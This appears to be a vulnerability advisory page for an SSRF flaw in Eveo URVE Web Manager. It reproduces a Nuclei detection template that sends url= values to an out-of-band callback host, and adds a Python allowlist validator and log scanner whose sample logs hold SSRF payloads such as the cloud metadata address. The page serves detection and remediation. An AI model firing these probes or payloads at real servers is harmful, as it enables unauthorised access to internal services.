CVE-2025-36845: Eveo URVE Web Manager - Server-Side Request Forgery

Date: 2026-01-24 | Affected software: Eveo URVE Web Manager | PoC: Public

Vulnerability Description

Eveo URVE Web Manager 27.02.2025 contains a server-side request forgery caused by improper validation of URL input in /_internal/redirect.php, letting attackers make requests to internal endpoints; exploitation requires crafted URL input.

PoC Code [Public]

id: CVE-2025-36845

info:
  name: Eveo URVE Web Manager - Server-Side Request Forgery
  author: DhiyaneshDk
  severity: high
  description: |
    Eveo URVE Web Manager 27.02.2025 contains a server-side request forgery caused by improper validation of URL input in /_internal/redirect.php, letting attackers make requests to internal endpoints, exploit requires crafted URL input.
  impact: |
    Attackers can make requests to internal-only accessible endpoints, potentially exposing sensitive internal services or data.
  remediation: |
    Update to the latest version with SSRF protections or apply input validation to restrict URL requests.
  reference:
    - https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-035.txt
    - https://smartoffice.expert/en
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"URVE Web Manager"
  tags: cve,cve2025,eveo,ssrf,oast,oob

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/urve/site/login.html?lang=en"

    matchers:
      - type: dsl
        dsl:
          - "contains(body, 'URVE Web Manager')"
          - "status_code == 200"
        condition: and
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/_internal/redirect.php?url=http://{{interactsh-url}}"

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
# digest: 4b0a00483046022100e8485b0f6e12dfd30ac43130dd20d7059168912b2c8db99550e2d11f32affcfa022100e6d23f89bb6bd11e0a804607ad7b8e2f0048044b1edd544ad3bdc8b9b3311ace:922c64590222798bb761d5b6d8e72950
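The template above only detects the flaw. As an added example (not code from the page, the Nuclei project or the vendor), the block below shows the two things a defender wants from this advisory: an allowlist-based validator of the kind the remediation note asks for, applied to a user-supplied redirect target, and a scan over access-log lines that flags requests to /_internal/redirect.php whose url= parameter fails that validation. The allowed hostnames, the log lines and the addresses in them are constructed for the example; nothing here is derived from the vendor's actual redirect.php.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlparse

# Hypothetical allowlist: the only hosts a redirect may legitimately point to.
ALLOWED_REDIRECT_HOSTS = {"urve.example.com", "sso.example.com"}
ALLOWED_SCHEMES = {"https"}


def is_internal_address(host: str) -> bool:
    """True if host is a literal IP that is private, loopback, link-local or otherwise non-global."""
    try:
        ip = ipaddress.ip_address(host.strip("[]"))
    except ValueError:
        return False  # not a literal IP; hostname handled by the allowlist
    return not ip.is_global


def validate_redirect_target(raw_url: str) -> tuple[bool, str]:
    """Allowlist check for a user-supplied redirect URL.

    Returns (ok, reason). Only absolute https URLs whose host is on the allowlist
    pass; other schemes, literal IPs, userinfo tricks and unknown hosts are rejected.
    """
    if not raw_url or len(raw_url) > 2048:
        return False, "empty or oversized url"
    parsed = urlparse(raw_url.strip())
    if parsed.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme not allowed: {parsed.scheme!r}"
    host = (parsed.hostname or "").lower()
    if not host:
        return False, "missing host"
    if parsed.username is not None or parsed.password is not None:
        return False, "userinfo in url"  # e.g. https://trusted@attacker-controlled/
    if is_internal_address(host):
        return False, "literal non-global ip"
    if host not in ALLOWED_REDIRECT_HOSTS:
        return False, f"host not on allowlist: {host}"
    return True, "ok"


# Constructed access-log lines in combined format (not real traffic).
SAMPLE_LOG = """\
203.0.113.10 - - [24/Jan/2026:10:00:01 +0000] "GET /urve/site/login.html?lang=en HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.10 - - [24/Jan/2026:10:00:05 +0000] "GET /_internal/redirect.php?url=https%3A%2F%2Fsso.example.com%2Flogin HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.7 - - [24/Jan/2026:10:01:13 +0000] "GET /_internal/redirect.php?url=http%3A%2F%2F169.254.169.254%2Flatest%2Fmeta-data%2F HTTP/1.1" 200 812 "-" "curl/8.0"
198.51.100.7 - - [24/Jan/2026:10:01:20 +0000] "GET /_internal/redirect.php?url=http%3A%2F%2Fplaceholder.oast.example HTTP/1.1" 200 0 "-" "curl/8.0"
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)


def flag_suspicious_redirects(log_text: str) -> list[dict]:
    """Return one record per request to /_internal/redirect.php whose url= fails validation."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parsed = urlparse(m.group("target"))
        if parsed.path != "/_internal/redirect.php":
            continue
        # parse_qs percent-decodes, so the validator sees the URL the server would act on.
        for url in parse_qs(parsed.query).get("url", []):
            ok, reason = validate_redirect_target(url)
            if not ok:
                hits.append({"src": m.group("src"), "ts": m.group("ts"), "url": url, "reason": reason})
    return hits


if __name__ == "__main__":
    for hit in flag_suspicious_redirects(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['src']} -> {hit['url']} ({hit['reason']})")
```

The validator deliberately rejects by allowlist rather than by blocklist: checking the literal-IP case is a defence in depth, but the decisive test is membership of the host in a fixed set, which is what stops both internal targets and out-of-band callback domains like the one the template's interactsh match relies on. The log scan reuses the same function so detection and the fix agree on what counts as a bad target.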
